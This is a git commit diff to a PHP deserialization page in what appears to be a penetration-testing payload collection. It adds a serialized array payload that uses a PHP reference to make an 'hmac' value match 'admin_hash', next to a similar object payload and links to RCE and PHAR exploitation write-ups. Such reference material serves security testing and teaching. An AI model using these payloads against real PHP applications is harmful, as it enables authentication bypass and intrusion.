Update PHP.md

2024-11-10 07:04:22 +00:00 · 2020-09-25 09:43:35 +07:00 · 2020-09-25 09:43:35 +07:00 · 992732877f
commit 992732877f
parent 0a01854a6a
1 changed files with 7 additions and 1 deletions
--- a/Deserialization/PHP.md
+++ b/Deserialization/PHP.md
@ -111,6 +111,12 @@ Payload:
 O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
 ```

+We can do an array to like this:
+
+```php
+a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
+```
+
 ## Finding and using gadgets

 Also called "PHP POP Chains", they can be used to gain RCE on the system.
@ -193,4 +199,4 @@ $poc->stopBuffering();
 * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
 * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
 * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
-* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
+* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)